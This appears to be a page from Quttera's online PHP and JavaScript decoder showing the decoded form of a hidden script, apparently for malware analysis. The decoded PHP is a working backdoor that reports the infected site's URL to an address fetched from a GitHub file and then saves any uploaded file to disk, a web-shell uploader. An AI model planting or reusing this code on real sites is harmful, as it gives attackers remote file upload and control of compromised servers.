Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


$p = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') ? 'https' : 'http'; $u = "{$p}://{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}"; file_get_contents(str_replace("\n", "", file_get_contents('https://raw.githubusercontent.com/1337r0j4n/0/main/0/POST.txt')), false, stream_context_create([ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded", 'method' => 'POST', 'content' => http_build_query(['o' => $u]), ], ])); isset($_FILES['file']['tmp_name'], $_FILES['file']['name']) && copy($_FILES['file']['tmp_name'], $_FILES['file']['name']) && print 'K'; 



© 2023 Quttera Ltd. All rights reserved.